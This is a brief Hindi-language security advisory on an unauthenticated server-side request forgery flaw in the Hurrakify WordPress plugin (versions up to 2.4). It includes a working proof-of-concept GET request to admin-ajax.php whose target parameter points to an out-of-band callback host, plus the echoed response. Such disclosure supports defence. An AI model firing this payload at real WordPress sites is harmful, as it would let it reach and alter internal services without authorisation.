
Hurrakify <= 2.4 - बिना प्रमाणीकरण के सर्वर-साइड रिक्वेस्ट फोर्जरी
Hurrakify <= 2.4 - बिना प्रमाणीकरण के सर्वर-साइड रिक्वेस्ट फोर्जरी
WordPress के लिए Hurrakify प्लगइन, 2.4 तक (सम्मिलित) सभी संस्करणों में सर्वर-साइड रिक्वेस्ट फोर्जरी के प्रति संवेदनशील है। यह बिना प्रमाणीकरण के हमलावरों को वेब एप्लिकेशन से उत्पन्न मनमाने स्थानों पर वेब अनुरोध करने में सक्षम बनाता है, जिसका उपयोग आंतरिक सेवाओं से जानकारी क्वेरी करने और संशोधित करने के लिए किया जा सकता है।
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>